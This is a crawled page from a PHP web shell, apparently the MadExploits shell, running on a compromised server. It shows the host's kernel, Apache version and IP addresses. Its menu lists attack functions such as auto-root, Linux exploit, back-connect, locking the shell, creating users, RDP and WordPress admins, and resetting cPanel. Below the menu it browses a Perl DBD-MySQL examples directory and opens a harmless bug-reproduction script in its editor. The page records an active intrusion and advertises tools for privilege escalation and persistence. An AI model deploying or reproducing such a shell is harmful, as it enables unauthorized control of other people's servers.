Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
perl-DBD-MySQL-4.023 /
eg /
[ HOME SHELL ]
Name
Size
Permission
Action
bug14979.pl
789
B
-rw-r--r--
bug21028.pl
2.19
KB
-rw-r--r--
bug30033.pl
868
B
-rw-r--r--
bug30033pg.pl
456
B
-rw-r--r--
decimal_test.pl
839
B
-rw-r--r--
issue21946.pl
848
B
-rw-r--r--
prepare_memory_usage.pl
450
B
-rw-r--r--
proc_example1.pl
1.03
KB
-rw-r--r--
proc_example2.pl
1.38
KB
-rw-r--r--
proc_example2a.pl
1.29
KB
-rw-r--r--
proc_example2b.pl
1.27
KB
-rw-r--r--
proc_example3.pl
901
B
-rw-r--r--
proc_example4.pl
1.36
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bug30033.pl
#!/usr/bin/perl use strict; use warnings; use Data::Dumper; use Getopt::Long; use DBI; our $opt_prepared; GetOptions ( "p|prepared" => \$opt_prepared ); my $dsn = "DBI:mysql:database=test;host=localhost"; $dsn .= ";mysql_server_prepare=1" if $opt_prepared; my $dbh = DBI->connect( $dsn, 'root', '', { RaiseError => 1 } ) or die $DBI::errstr; unlink('./bug3033.trace.log'); $dbh->trace(4, './bug3033_trace.log'); $dbh->do('DROP TABLE IF EXISTS buggy'); $dbh->do('CREATE TABLE buggy ( id int(3) )'); $dbh->do('INSERT INTO buggy (id) VALUES (1)'); my $query= "SELECT id FROM -- It's a bug buggy WHERE id = ?"; print "with var:\n"; my $ref= $dbh->selectall_arrayref($query, {}, 1); print Dumper $ref; print "with string terminator:\n"; $ref= $dbh->selectall_arrayref(<<END, {}, 1); SELECT id FROM buggy -- It's a bug! WHERE id = ? END print Dumper $ref;
Close